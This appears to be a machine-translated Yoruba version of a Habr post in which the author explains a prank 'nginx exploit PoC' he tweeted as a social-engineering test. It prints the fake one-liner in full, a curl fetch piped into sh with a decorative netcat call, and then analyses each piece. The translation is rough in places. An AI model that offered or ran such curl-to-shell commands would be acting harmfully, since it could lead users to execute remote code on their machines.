Akiyesi. itumọ.:
TL; DR: Maṣe lo pipelining faili ni sh tabi bash labẹ eyikeyi ayidayida. Eyi jẹ ọna nla lati padanu iṣakoso kọmputa rẹ.
Mo fẹ lati pin pẹlu rẹ itan kukuru kan nipa ilokulo PoC apanilerin kan ti o ṣẹda ni Oṣu Karun ọjọ 31st. O han ni kiakia ni esi si awọn iroyin lati
Lẹhin ti o ti pari ṣiṣẹ lori ilana imudani tuntun ni curl, Mo sọ tweet atilẹba ati “jo PoC ti n ṣiṣẹ” ti o ni laini koodu kan ti o ro pe o lo ailagbara ti a ṣe awari. Nitoribẹẹ, isọkusọ patapata ni eyi jẹ. Mo ro pe Emi yoo farahan lẹsẹkẹsẹ, ati pe ti o dara julọ Emi yoo gba awọn atunkọ meji kan (oh daradara).
Sibẹsibẹ, Emi ko le fojuinu ohun ti o ṣẹlẹ nigbamii. Olokiki tweet mi ti lọ soke. Iyalenu, ni akoko (15:00 Moscow akoko June 1) diẹ eniyan ti mọ pe eyi jẹ iro. Ọpọlọpọ eniyan tun ṣe atuntu rẹ laisi ṣiṣayẹwo rẹ rara (jẹ ki o kan riri awọn aworan ASCII ẹlẹwa ti o ṣe jade).
O kan wo bi o ṣe lẹwa to!
Lakoko ti gbogbo awọn losiwajulosehin ati awọn awọ wọnyi jẹ nla, o han gbangba pe eniyan ni lati ṣiṣẹ koodu lori ẹrọ wọn lati rii wọn. Ni Oriire, awọn aṣawakiri n ṣiṣẹ ni ọna kanna, ati ni idapo pẹlu otitọ pe Emi ko fẹ gaan lati wọle sinu wahala ofin, koodu ti a sin sinu aaye mi kan n ṣe awọn ipe iwoyi laisi igbiyanju lati fi sii tabi ṣiṣẹ eyikeyi koodu afikun.
Ibanujẹ kekere kan:
curl -gsS https://127.0.0.1-OR-VICTIM-SERVER:443/../../../%00/nginx-handler?/usr/lib/nginx/modules/ngx_stream_module.so:127.0.0.1:80:/bin/sh%00<'protocol:TCP' -O 0x0238f06a#PLToffset |sh; nc /dev/tcp/localhost
Awujọ-itanna ẹrọ (WO) - diẹ sii ju aṣiri-ararẹ kan lọ
Aabo ati faramọ jẹ apakan pataki ti idanwo yii. Mo ro pe wọn jẹ ohun ti o yori si aṣeyọri rẹ. Laini aṣẹ naa ṣe afihan aabo ni kedere nipa tọka si “127.0.0.1” (agbegbe agbegbe ti a mọ daradara). Localhost ni a ka ni aabo ati pe data lori rẹ ko fi kọnputa rẹ silẹ.
Imọmọ jẹ bọtini keji WO paati idanwo naa. Niwọn igba ti awọn olugbo ibi-afẹde ni akọkọ jẹ ti awọn eniyan ti o faramọ awọn ipilẹ ti aabo kọnputa, o ṣe pataki lati ṣẹda koodu ki awọn apakan ti o dabi ẹni pe o faramọ ati faramọ (ati nitorinaa ailewu). Yiya awọn eroja ti awọn imọran ilokulo atijọ ati apapọ wọn ni ọna dani ti fihan pe o ṣaṣeyọri pupọ.
Ni isalẹ ni a alaye onínọmbà ti awọn ọkan-ila. Ohun gbogbo ti o wa ninu atokọ yii wọ ohun ikunra iseda, ati pe ko si ohunkan ti a beere fun iṣẹ gangan rẹ.
Ohun ti irinše ni o wa gan pataki? Eyi -gsS
, -O 0x0238f06a
, |sh
ati olupin ayelujara funrararẹ. Olupin wẹẹbu naa ko ni awọn ilana irira eyikeyi ninu, ṣugbọn ṣe iranṣẹ awọn aworan ASCII ni lilo awọn aṣẹ echo
ninu iwe afọwọkọ ti o wa ninu index.html
. Nigbati olumulo ba tẹ ila kan pẹlu |sh
ni aarin, index.html
kojọpọ ati ki o ṣiṣẹ. O da, awọn olutọju olupin wẹẹbu ko ni awọn ero buburu.
-
../../../%00
- duro ti lọ kọja liana; -
ngx_stream_module.so
- ọna si module NGINX ID; -
/bin/sh%00<'protocol:TCP'
- a gbimo gbesita/bin/sh
lori ẹrọ ibi-afẹde ati ki o ṣe atunṣe abajade si ikanni TCP; -
-O 0x0238f06a#PLToffset
- eroja ikoko, afikun#PLToffset
, lati dabi aiṣedeede iranti bakan ti o wa ninu PLT; -
|sh;
- miiran pataki ajeku. A nilo lati ṣe atunṣe iṣelọpọ si sh/bash lati le ṣe koodu ti nbọ lati ọdọ olupin wẹẹbu ikọlu ti o wa ni0x0238f06a
(2.56.240.x
); -
nc /dev/tcp/localhost
- a idinwon ninu eyi ti netcat ntokasi si/dev/tcp/localhost
ki ohun gbogbo dabi ailewu lẹẹkansi. Ni otitọ, ko ṣe nkankan ati pe o wa ninu laini fun ẹwa.
Eyi pari iyipada ti iwe afọwọkọ laini kan ati ijiroro ti awọn apakan ti “imọ-ẹrọ-ẹrọ itanna” (ararẹ intricate).
Iṣeto ni olupin wẹẹbu ati Awọn iwọnwọn
Niwọn igba ti o pọ julọ ti awọn alabapin mi jẹ infosec / olosa, Mo pinnu lati jẹ ki olupin wẹẹbu naa ni itara diẹ si awọn ikosile ti “anfani” ni apakan wọn, ki awọn eniyan le ni nkankan lati ṣe (ati pe yoo jẹ igbadun lati ṣe. ṣeto). Emi kii yoo ṣe atokọ gbogbo awọn ipalara nibi nitori idanwo naa tun nlọ lọwọ, ṣugbọn eyi ni awọn nkan diẹ ti olupin n ṣe:
- Ṣe abojuto awọn igbiyanju pinpin kaakiri lori awọn nẹtiwọọki awujọ kan ati rọpo ọpọlọpọ awọn eekanna atanpako awotẹlẹ lati gba olumulo niyanju lati tẹ ọna asopọ naa.
- Ṣe atunṣe Chrome/Mozilla/Safari/ati bẹbẹ lọ si fidio ipolowo Thugcrowd dipo fifi iwe afọwọkọ ikarahun han.
- Wiwo fun awọn ami OBVIOUS ti ifọle / sakasaka gbangba, ati lẹhinna bẹrẹ ṣiṣatunṣe awọn ibeere si awọn olupin NSA (ha!).
- Fi Tirojanu kan sori ẹrọ, bakanna bi rootkit BIOS kan, lori gbogbo awọn kọnputa ti awọn olumulo ṣabẹwo si agbalejo lati ẹrọ aṣawakiri deede (o kan ṣe awada!).
Apa kekere ti awọn antimers
Ni ọran yii, ibi-afẹde mi nikan ni lati ṣakoso diẹ ninu awọn ẹya Apache - ni pataki, awọn ofin tutu fun awọn ibeere atunṣe - ati pe Mo ro: kilode?
Lo nilokulo NGINX (gidi!)
Alabapin si
orisun: www.habr.com